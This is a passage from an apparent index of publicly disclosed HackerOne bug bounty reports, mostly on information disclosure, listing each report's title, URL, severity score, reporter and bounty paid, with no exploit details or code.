\nhttps://hackerone.com/reports/179034\n#### Severity score\nnull\n#### Reporter \nh4ckninja\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path disclosure on 500 error\n#### URL \nhttps://hackerone.com/reports/708076\n#### Severity score\nnull\n#### Reporter \nrajauzairabdullah\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPentester can obtain information about other pentesters who applied for the same test, but weren't accepted\n#### URL \nhttps://hackerone.com/reports/958374\n#### Severity score\n3.4\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nCircleCI token in github repo allows for access to sensitive build information\n#### URL \nhttps://hackerone.com/reports/858915\n#### Severity score\nnull\n#### Reporter \ndwimmerlaik\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nProgram metrics disclosed response_efficiency_percentage via /program_name json response despite the team decided not to show on their profile\n#### URL \nhttps://hackerone.com/reports/347693\n#### Severity score\n5\n#### Reporter \njapz\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nApache version disclosed on developer.leaseweb.com\n#### URL \nhttps://hackerone.com/reports/117593\n#### Severity score\nnull\n#### Reporter \nbugs3ra\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\najaxgetachievementsforgame is not guarded for unreleased apps\n#### URL \nhttps://hackerone.com/reports/835087\n#### Severity score\n5.3\n#### Reporter \njameslll\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nPublic Vulnerable Version of Confluence https://confluence.olx.com\n#### URL \nhttps://hackerone.com/reports/207013\n#### Severity score\nnull\n#### Reporter \nhdbreaker\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCONCRETE5 - path disclosure.\n#### URL \nhttps://hackerone.com/reports/4931\n#### Severity score\nnull\n#### Reporter \nsmiegles\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[affiliates.udemy.com] Wordpress user admin information discloure\n#### URL \nhttps://hackerone.com/reports/370777\n#### Severity score\nnull\n#### Reporter \ntoannc123\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nDirect IP Access\n#### URL \nhttps://hackerone.com/reports/183318\n#### Severity score\nnull\n#### Reporter \nph_spade\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser personal data disclosure via API\n#### URL \nhttps://hackerone.com/reports/630235\n#### Severity score\n4.2\n#### Reporter \nmorax\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/186530\n#### Severity score\nnull\n#### Reporter \nreptou\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation leakage on https://docs.gdax.com\n#### URL \nhttps://hackerone.com/reports/168509\n#### Severity score\nnull\n#### Reporter \n0xorigin\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nInformation leakage via CSV when content is valid JavaScript\n#### URL \nhttps://hackerone.com/reports/207266\n#### Severity score\nnull\n#### Reporter \nmikkocarreon\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nПросмотр любых статей по их айди.\n#### URL \nhttps://hackerone.com/reports/589400\n#### Severity score\nnull\n#### Reporter \ncheatboss\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nProject Milestones Disclosed Via Groups When the Victim disabled milestones access in project settings\n#### URL \nhttps://hackerone.com/reports/636560\n#### Severity score\nnull\n#### Reporter \nuzsunnyz\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nFull Path Disclosure (FPD) in www.localize.im\n#### URL \nhttps://hackerone.com/reports/9745\n#### Severity score\nnull\n#### Reporter \nfaisalahmed\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAbility to see common response titles of other teams (limited)\n#### URL \nhttps://hackerone.com/reports/31383\n#### Severity score\nnull\n#### Reporter \nprakharprasad\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nopenssh-server Forced Command Handling Information Disclosure Vulnerability on blog.greenhouse.io\n#### URL \nhttps://hackerone.com/reports/24984\n#### Severity score\nnull\n#### Reporter \nsimon90\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNo email verification on username change\n#### URL \nhttps://hackerone.com/reports/29331\n#### Severity score\nnull\n#### Reporter \nshahmeer-amir\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\n[Partial] SSN & [PII] exposed through iPERMs Presentation Slide.\n#### URL \nhttps://hackerone.com/reports/719631\n#### Severity score\nnull\n#### Reporter \neuropol\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nConfidential data of users and limited metadata of programs and reports accessible via GraphQL\n#### URL \nhttps://hackerone.com/reports/489146\n#### Severity score\n9.3\n#### Reporter \nyashrs\n### Bounty paid\n$20,000\n\n\n---\n\n\n### Title\nSlack-Corp Heroku application disclosing limited info about company members\n#### URL \nhttps://hackerone.com/reports/966814\n#### Severity score\n3.7\n#### Reporter \ndemonia\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nUser object in GraphQL exposes number of trial reports for External Programs that also have a Private Program\n#### URL \nhttps://hackerone.com/reports/350964\n#### Severity score\nnull\n#### Reporter \nashish_r_padelkar\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHidden scheduled partner events are propagated to Steam clients in CMsgClientClanState\n#### URL \nhttps://hackerone.com/reports/780167\n#### Severity score\nnull\n#### Reporter \nxpaw\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nFull path disclosure on track.uber.com\n#### URL \nhttps://hackerone.com/reports/125197\n#### Severity score\nnull\n#### Reporter \nfirs0v\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nLeak of all project names and all user names , even across applications\n#### URL \nhttps://hackerone.com/reports/152696\n#### Severity score\nnull\n#### Reporter \neboda\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nЛоги на http://login.aa.mail.ru/logs/\n#### URL \nhttps://hackerone.com/reports/985272\n#### Severity score\nnull\n#### Reporter \ndevirok\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nNginx misconfiguration leading to direct PHP source code download\n#### URL \nhttps://hackerone.com/reports/268382\n#### Severity score\nnull\n#### Reporter \ntolo7010\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/195836\n#### Severity score\nnull\n#### Reporter \nsp1d3rs\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImformation Disclosure on id.rapida.ru\n#### URL \nhttps://hackerone.com/reports/318571\n#### Severity score\nnull\n#### Reporter \ndanila\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\ncomment out causes information disclosure\n#### URL \nhttps://hackerone.com/reports/57125\n#### Severity score\nnull\n#### Reporter \nshhnjk\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAXFR на plexus.m.smailru.net работает\n#### URL \nhttps://hackerone.com/reports/137093\n#### Severity score\nnull\n#### Reporter \nisox\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSmartsheet employees email disclosure through enpoint after login.\n#### URL \nhttps://hackerone.com/reports/880089\n#### Severity score\n3.7\n#### Reporter \nsoareswallace\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nServer side information disclosure on a DoD website\n#### URL \nhttps://hackerone.com/reports/191830\n#### Severity score\nnull\n#### Reporter \nsamhax\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSSRF in upload IMG through URL\n#### URL \nhttps://hackerone.com/reports/228377\n#### Severity score\nnull\n#### Reporter \nmariuszpoplawski\n### Bounty paid\n$64\n\n\n---\n\n\n### Title\nfull path disclosure on world.engelvoelkers.com via error messages\n#### URL \nhttps://hackerone.com/reports/809645\n#### Severity score\nnull\n#### Reporter \norganiccrap\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n.git file accessible on remote.bittorrent.com\n#### URL \nhttps://hackerone.com/reports/846400\n#### Severity score\nnull\n#### Reporter \naslanemre\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nValidation message in Bounty award endpoint can be used to determine program balances\n#### URL \nhttps://hackerone.com/reports/293299\n#### Severity score\n5\n#### Reporter \ncyriac\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nInformation disclosure\n#### URL \nhttps://hackerone.com/reports/152499\n#### Severity score\nnull\n#### Reporter \namirisme\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSharePoint exposed web services\n#### URL \nhttps://hackerone.com/reports/300539\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMinimum bounty of a private program is visible for users that were removed from the program\n#### URL \nhttps://hackerone.com/reports/94336\n#### Severity score\nnull\n#### Reporter \ncoolboss\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMinimal information disclosure of internal asset names and links which were not publicly accessible.\n#### URL \nhttps://hackerone.com/reports/805699\n#### Severity score\nnull\n#### Reporter \ne4366eolywrgpidfbio\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCompromising the user ID\n#### URL \nhttps://hackerone.com/reports/358007\n#### Severity score\nnull\n#### Reporter \njarvis7\n### Bounty paid\n$280\n\n\n---\n\n\n### Title\nPublicly accessible Grafana install allows pivoting to Prometheus datasource\n#### URL \nhttps://hackerone.com/reports/764731\n#### Severity score\nnull\n#### Reporter \ngnarlygoat\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nfull path disclosure vulnerability at https://security.olx.com/*\n#### URL \nhttps://hackerone.com/reports/159481\n#### Severity score\nnull\n#### Reporter \nunkn7wn\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNgnix Server version disclosure\n#### URL \nhttps://hackerone.com/reports/141125\n#### Severity score\nnull\n#### Reporter \nahsan\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nDeleted name still present via mouseover functionality for user accounts\n#### URL \nhttps://hackerone.com/reports/127914\n#### Severity score\nnull\n#### Reporter \nmeals\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPublicly accessible Order confirmations leaking User Emails on ███\n#### URL \nhttps://hackerone.com/reports/323992\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTeam object in GraphQL disclosed private_comment\n#### URL \nhttps://hackerone.com/reports/978143\n#### Severity score\n5\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nShopify GitHub Login and Password exposed all private source code might be available.\n#### URL \nhttps://hackerone.com/reports/124100\n#### Severity score\nnull\n#### Reporter \ntodayisnew\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nReport Private Links Leaks to Google Analytics via Query String Param\n#### URL \nhttps://hackerone.com/reports/269479\n#### Severity score\nnull\n#### Reporter \nr3y\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUnauthorized access to private project security dashboard\n#### URL \nhttps://hackerone.com/reports/853355\n#### Severity score\nnull\n#### Reporter \nvaib25vicky\n### Bounty paid\n$2,000\n\n\n---\n\n\n### Title\nMicrosoft IIS tilde directory enumeration\n#### URL \nhttps://hackerone.com/reports/148777\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$20\n\n\n---\n\n\n### Title\nDisclosure of external users invited to a specific report\n#### URL \nhttps://hackerone.com/reports/157699\n#### Severity score\nnull\n#### Reporter \nkirils\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nHadoop Node available to public\n#### URL \nhttps://hackerone.com/reports/44052\n#### Severity score\nnull\n#### Reporter \nisox\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nJIRA account misconfig causes internal info leak\n#### URL \nhttps://hackerone.com/reports/139970\n#### Severity score\nnull\n#### Reporter \nkamil_hism\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTorrent Viewer extension web service available on all interfaces\n#### URL \nhttps://hackerone.com/reports/300181\n#### Severity score\nnull\n#### Reporter \nbeurtschipper\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nTotal Paid Bounty Paid can be disclose\n#### URL \nhttps://hackerone.com/reports/674757\n#### Severity score\nnull\n#### Reporter \nzrachessanasz\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nMonitor\n#### URL \nhttps://hackerone.com/reports/265786\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nShopify's SF and LA offices Dashboard Information disclosed via Public Gist\n#### URL \nhttps://hackerone.com/reports/729040\n#### Severity score\nnull\n#### Reporter \nehsahil\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nAdmin/Info lekage\n#### URL \nhttps://hackerone.com/reports/964315\n#### Severity score\nnull\n#### Reporter \nabhhi\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nПросмотр любых записей на стене\n#### URL \nhttps://hackerone.com/reports/341675\n#### Severity score\nnull\n#### Reporter \ntrainzment\n### Bounty paid\n$700\n\n\n---\n\n\n### Title\nInvitation token leaks to https://bat.bing.com\n#### URL \nhttps://hackerone.com/reports/301526\n#### Severity score\n2.7\n#### Reporter \nzuriel\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nRequestor Email Disclosure via Email Notification\n#### URL \nhttps://hackerone.com/reports/202361\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ndon't leak Server version for assets.gratipay.com\n#### URL \nhttps://hackerone.com/reports/149710\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nВывод значений переменных Nginx в теле страницы\n#### URL \nhttps://hackerone.com/reports/370094\n#### Severity score\nnull\n#### Reporter \nwebr0ck\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nAWS bucket leading to iOS test build code and configuration exposure\n#### URL \nhttps://hackerone.com/reports/404822\n#### Severity score\nnull\n#### Reporter \nkiyell\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nDNSSEC Zone Walk using NSEC Records\n#### URL \nhttps://hackerone.com/reports/228471\n#### Severity score\n0\n#### Reporter \npk21\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nGFM renderer leaks external issue tracker URL of private project\n#### URL \nhttps://hackerone.com/reports/133717\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nСпособ узнать имя человека удаленной страницы 2\n#### URL \nhttps://hackerone.com/reports/193759\n#### Severity score\nnull\n#### Reporter \npisarenko\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDe-anonymization Attack: Cross Site Information Leakage\n#### URL \nhttps://hackerone.com/reports/723175\n#### Severity score\nnull\n#### Reporter \nsoheilkhodayari\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nLack of CNAME/A Record Trimming Pointing Uber Domains to Insecure Non-Uber AWS Instances/Sites\n#### URL \nhttps://hackerone.com/reports/125118\n#### Severity score\nnull\n#### Reporter \njutsuce\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nUsing GraphQL, STAFF with NO explicit permissions on Store can retrieve Shopify Payments Balance.\n#### URL \nhttps://hackerone.com/reports/417170\n#### Severity score\n3.4\n#### Reporter \nh13-\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPending member invitations are not revoked on program name change\n#### URL \nhttps://hackerone.com/reports/275293\n#### Severity score\nnull\n#### Reporter \nashish_r_padelkar\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser Enumeration\n#### URL \nhttps://hackerone.com/reports/280509\n#### Severity score\nnull\n#### Reporter \nsaikiran-10098\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n2 Directory Listing on ledger.brave.com & vault-staging.brave.com\n#### URL \nhttps://hackerone.com/reports/175320\n#### Severity score\nnull\n#### Reporter \nbibo\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nKnow undisclosed Bounty Amount when Bounty Statistics are enabled.\n#### URL \nhttps://hackerone.com/reports/148050\n#### Severity score\nnull\n#### Reporter \nvijay_kumar\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSensitive user information disclosure at bonjour.uber.com/marketplace/_rpc via the 'userUuid' parameter\n#### URL \nhttps://hackerone.com/reports/542340\n#### Severity score\n8.5\n#### Reporter \nanandprakash_\n### Bounty paid\n$6,500\n\n\n---\n\n\n### Title\nInformation About Your System(Sensitive Directories)\n#### URL \nhttps://hackerone.com/reports/200572\n#### Severity score\nnull\n#### Reporter \nsocialfox\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nfull path disclosure from false language\n#### URL \nhttps://hackerone.com/reports/13237\n#### Severity score\nnull\n#### Reporter \nbrook2\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCORS misconfiguration leads to users information disclosure at https://studyroom.line.me\n#### URL \nhttps://hackerone.com/reports/924951\n#### Severity score\n5.7\n#### Reporter \ndhbd88\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nActivities are not Protected and able to crash app using other app (Can Malware or third parry app).\n#### URL \nhttps://hackerone.com/reports/65729\n#### Severity score\nnull\n#### Reporter \nbugwrangler\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nDropcontact's disclosed report is exposing Private/Confidential information\n#### URL \nhttps://hackerone.com/reports/963327\n#### Severity score\n8.2\n#### Reporter \nn1m0\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer side information disclosure\n#### URL \nhttps://hackerone.com/reports/192577\n#### Severity score\nnull\n#### Reporter \nsamhax\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n SharePoint Web Services Exposed to Anonymous Access\n#### URL \nhttps://hackerone.com/reports/920401\n#### Severity score\nnull\n#### Reporter \nbalisong\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImgur dev environments facing the Internet\n#### URL \nhttps://hackerone.com/reports/100916\n#### Severity score\nnull\n#### Reporter \nnathonsecurity\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\ninformation disclose\n#### URL \nhttps://hackerone.com/reports/223759\n#### Severity score\nnull\n#### Reporter \nabdul1ah\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[informatica.com]- Information Disclosure \n#### URL \nhttps://hackerone.com/reports/204239\n#### Severity score\nnull\n#### Reporter \nirotem2\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosed Version of PORTS SSH|HTTP|SSL\n#### URL \nhttps://hackerone.com/reports/358102\n#### Severity score\nnull\n#### Reporter \nbb00x\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nWordpress users disclosure on blog.makerdao.con\n#### URL \nhttps://hackerone.com/reports/684701\n#### Severity score\nnull\n#### Reporter \nardi4x\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser guessing/enumeration at sw.khanacademy.org\n#### URL \nhttps://hackerone.com/reports/6376\n#### Severity score\nnull\n#### Reporter \ninternetwache\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[razer-assets2] Listing of Amazon S3 Bucket accessible to any AWS cli \n#### URL \nhttps://hackerone.com/reports/710319\n#### Severity score\nnull\n#### Reporter \nsnwlol\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nFull Path Disclosure\n#### URL \nhttps://hackerone.com/reports/9137\n#### Severity score\nnull\n#### Reporter \nmohamed_fouad\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n credentials leakage in public lead to view dev websites \n#### URL \nhttps://hackerone.com/reports/511440\n#### Severity score\nnull\n#### Reporter \nxsam\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nPartial disclosure of undisclosed programs through tags\n#### URL \nhttps://hackerone.com/reports/302620\n#### Severity score\nnull\n#### Reporter \nbigbug\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n████ discloses valid Airbnb SSO login names via Google Search Results\n#### URL \nhttps://hackerone.com/reports/161659\n#### Severity score\nnull\n#### Reporter \naesteral\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nbug reporting template encourages users to paste config file with passwords\n#### URL \nhttps://hackerone.com/reports/196969\n#### Severity score\nnull\n#### Reporter \nhanno\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHijacking user session by forcing the use of invalid HTTPs Certificate on images.gratipay.com\n#### URL \nhttps://hackerone.com/reports/124976\n#### Severity score\nnull\n#### Reporter \nashesh\n### Bounty paid\n$1\n\n\n---\n\n\n### Title\nAmazon Bucket Accessible (http://inpref.s3.amazonaws.com/)\n#### URL \nhttps://hackerone.com/reports/137487\n#### Severity score\nnull\n#### Reporter \nxmly\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\n[qiwi.com] .bash_history\n#### URL \nhttps://hackerone.com/reports/190195\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\n[ling.go.mail.ru] Server-Status opened for all users\n#### URL \nhttps://hackerone.com/reports/90691\n#### Severity score\nnull\n#### Reporter \nbigbear_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNgnix Server version disclosure.\n#### URL \nhttps://hackerone.com/reports/947637\n#### Severity score\nnull\n#### Reporter \nkapkan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInstagram OAuth2 Implementation Leaks Access Token; Allows for Cross-Site Script Inclusion (XSSI)\n#### URL \nhttps://hackerone.com/reports/138270\n#### Severity score\nnull\n#### Reporter \ndejavuln\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nНежелательная информация\n#### URL \nhttps://hackerone.com/reports/34799\n#### Severity score\nnull\n#### Reporter \nbigbear\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nVersion Disclosure (NginX)\n#### URL \nhttps://hackerone.com/reports/94610\n#### Severity score\nnull\n#### Reporter \nprotector47\n### Bounty paid\n$20\n\n\n---\n\n\n### Title\nAdmin Login Credential Leak for DoD Gitlab EE instance\n#### URL \nhttps://hackerone.com/reports/799898\n#### Severity score\nnull\n#### Reporter \ndaehee\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nRoot user disclosure in data.gov domain though x-amz-meta-s3cmd-attrs header\n#### URL \nhttps://hackerone.com/reports/374907\n#### Severity score\nnull\n#### Reporter \nsneakerz\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\n[expressjs-ip-control] Whitelist IP bypass leads to authorization bypass and sensitive info disclosure\n#### URL \nhttps://hackerone.com/reports/693788\n#### Severity score\nnull\n#### Reporter \nmik317\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAccessable Htaccess\n#### URL \nhttps://hackerone.com/reports/171272\n#### Severity score\nnull\n#### Reporter \nnigba\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nVisibility Robots.txt file\n#### URL \nhttps://hackerone.com/reports/156182\n#### Severity score\nnull\n#### Reporter \nnigba\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPHP PDOException and Full Path Disclosure\n#### URL \nhttps://hackerone.com/reports/15899\n#### Severity score\nnull\n#### Reporter \nsupernatural\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBackup Source Code Detected\n#### URL \nhttps://hackerone.com/reports/309537\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nUn-handled exception leads to Information Disclosure\n#### URL \nhttps://hackerone.com/reports/96847\n#### Severity score\nnull\n#### Reporter \nsarwarjahan\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nSearch query text, including from potentially undisclosed reports, sent to Google Analytics on Inbox query page\n#### URL \nhttps://hackerone.com/reports/280770\n#### Severity score\nnull\n#### Reporter \nholvonix-advay\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nWordPress username enumeration (/author)\n#### URL \nhttps://hackerone.com/reports/335427\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nGIT Detected\n#### URL \nhttps://hackerone.com/reports/221298\n#### Severity score\nnull\n#### Reporter \nlulliii\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nListing of Amazon S3 Bucket accessible to any amazon authenticated user (vector-maps-e457472599)\n#### URL \nhttps://hackerone.com/reports/631529\n#### Severity score\nnull\n#### Reporter \nzer0ttl\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nПросмотр Участников ЧАСТНОЙ встречи \n#### URL \nhttps://hackerone.com/reports/261764\n#### Severity score\nnull\n#### Reporter \npisarenko\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nBreach Attack Vulnerability\n#### URL \nhttps://hackerone.com/reports/17311\n#### Severity score\nnull\n#### Reporter \nanonymous_india\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[p2p.qiwi.com] nginx alias traversal\n#### URL \nhttps://hackerone.com/reports/455858\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nLeaking sensitive information on Github lead full access to all Grab Slack channels \n#### URL \nhttps://hackerone.com/reports/397527\n#### Severity score\nnull\n#### Reporter \nxsam\n### Bounty paid\n$7,000\n\n\n---\n\n\n### Title\nNone permission staff member can identify installed application and products attached to it\n#### URL \nhttps://hackerone.com/reports/848625\n#### Severity score\nnull\n#### Reporter \nsreeju_kc\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nManipulate hacker profile and private program hacktivity to expose your name as researchers who is actively submitting reports with resolve status\n#### URL \nhttps://hackerone.com/reports/654198\n#### Severity score\n3.4\n#### Reporter \njapz\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nNon-Cloudflare IPs allowed to access origin servers\n#### URL \nhttps://hackerone.com/reports/255978\n#### Severity score\nnull\n#### Reporter \nmoritz30\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nЛоги/sql запросы на http://mx36.ucs.ru/ и reflected XSS.\n#### URL \nhttps://hackerone.com/reports/900930\n#### Severity score\nnull\n#### Reporter \n0x01alka\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nInformation Disclosure on lite.uber.com\n#### URL \nhttps://hackerone.com/reports/133375\n#### Severity score\nnull\n#### Reporter \nkusl\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAnonymous file drop page ignores user profile visibility restrictions\n#### URL \nhttps://hackerone.com/reports/752353\n#### Severity score\nnull\n#### Reporter \npshknst\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nreadble .htaccess + Source Code Disclosure (+ .SVN repository)\n#### URL \nhttps://hackerone.com/reports/7813\n#### Severity score\nnull\n#### Reporter \nnahamsec\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nDirectory Listening\n#### URL \nhttps://hackerone.com/reports/151772\n#### Severity score\nnull\n#### Reporter \nkiraak-boy\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAndroid MailRu Email: Thirdparty can access private data files with small user interaction\n#### URL \nhttps://hackerone.com/reports/226191\n#### Severity score\n4.4\n#### Reporter \ndzmitry\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\n[Brave browser] WebTorrent has DNS rebinding vulnerability\n#### URL \nhttps://hackerone.com/reports/663729\n#### Severity score\nnull\n#### Reporter \nxiaoyinl\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\n[RCE] Unserialize to XXE - file disclosure on ams.upload.pornhub.com\n#### URL \nhttps://hackerone.com/reports/142562\n#### Severity score\nnull\n#### Reporter \n5haked\n### Bounty paid\n$10,000\n\n\n---\n\n\n### Title\nNumber of invited researchers disclosed as part of JSON search response\n#### URL \nhttps://hackerone.com/reports/80597\n#### Severity score\nnull\n#### Reporter \njessescitech\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nDIrectory Listing Found\n#### URL \nhttps://hackerone.com/reports/138558\n#### Severity score\nnull\n#### Reporter \nharikrishnan_c\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure through search engines (password reset token)\n#### URL \nhttps://hackerone.com/reports/322988\n#### Severity score\n6.1\n#### Reporter \nnitesculucian\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nПросмотр инфы на странице пользователя или группы который тебя добавил в ЧС\n#### URL \nhttps://hackerone.com/reports/505347\n#### Severity score\nnull\n#### Reporter \npisarenko\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nbeta version reveals paths, environment variables and partially files contents\n#### URL \nhttps://hackerone.com/reports/129869\n#### Severity score\nnull\n#### Reporter \nuyga\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[opensource.mail.ru] system accounts enumeration\n#### URL \nhttps://hackerone.com/reports/153178\n#### Severity score\nnull\n#### Reporter \nkonqi\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAdministrator(s) Information disclosure via JSON on wordpress.org\n#### URL \nhttps://hackerone.com/reports/221734\n#### Severity score\nnull\n#### Reporter \n596a96cc7bf9108cd896f33c4\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nH1514 Get access to non public information by pivoting with graphql queries\n#### URL \nhttps://hackerone.com/reports/423388\n#### Severity score\nnull\n#### Reporter \nemitrani\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nUser Enumeration : Due to rate limiting on registration\n#### URL \nhttps://hackerone.com/reports/97609\n#### Severity score\nnull\n#### Reporter \nshailesh4594\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[allods.my.com] Full Path Disclosure\n#### URL \nhttps://hackerone.com/reports/97319\n#### Severity score\nnull\n#### Reporter \nbigbear_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExposed Git Repo at http://betaforum.tomtom.com/.git/{subfolders}\n#### URL \nhttps://hackerone.com/reports/541349\n#### Severity score\nnull\n#### Reporter \ndaniel_v\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBypass of anti-SSRF defenses in YahooCacheSystem (affecting at least YQL and Pipes)\n#### URL \nhttps://hackerone.com/reports/1066\n#### Severity score\nnull\n#### Reporter \nagarri_fr\n### Bounty 